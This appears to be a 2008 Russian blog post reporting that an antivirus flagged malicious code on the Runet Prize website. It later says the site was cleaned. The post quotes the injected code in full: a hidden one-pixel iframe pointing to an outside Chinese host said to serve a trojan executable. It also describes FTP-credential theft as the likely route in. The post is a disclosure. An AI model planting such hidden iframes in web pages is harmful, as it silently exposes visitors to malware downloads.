Сегодня на официальном сайте общенациональной награды в области Интернета и высоких технологий - Премии Рунета - моим антивирусом (NOD32) был обнаружен вредоносный код, который был успешно блокирован.

Ссылка в коде указывает на некий китайский сайт colehost, на котором и лежит файл load.exe, содержащий модифицированное вредное приложение win32/Statik. Недобрый код выглядит так:

<iframe pmuxy='fUDYebvl' smyra='yBAsCXRW' src='http://www.colehost.cn/?6 ' uhwyj='EZiN6X5o' width='1' height='1' style='display:none'></iframe>

По всей видимости причина его появления в небрежности технических специалистов, поддерживающих сайт на хостинге - поскольку обычно трояны, меняющие код сайта, могут попасть в систему путём использования "дырявого IE" без хорошего антивируса, в результате чего попавший таким образом в систему троян передаёт файлы FTP-подключений на удалённый хост, откуда файлы сайта и пополняются вредными заразами в виде iframe и div-блоков.

UPD / 21.04.2008: Утром получил письмо от специалиста Регионального общественного Центра Интернет-технологий (РОЦИТ) о том, что вирус был благополучно удалён с сайта Премии. Сайт чист :- ). Спасибо за оперативную реакцию технического персонала!

Метки: ,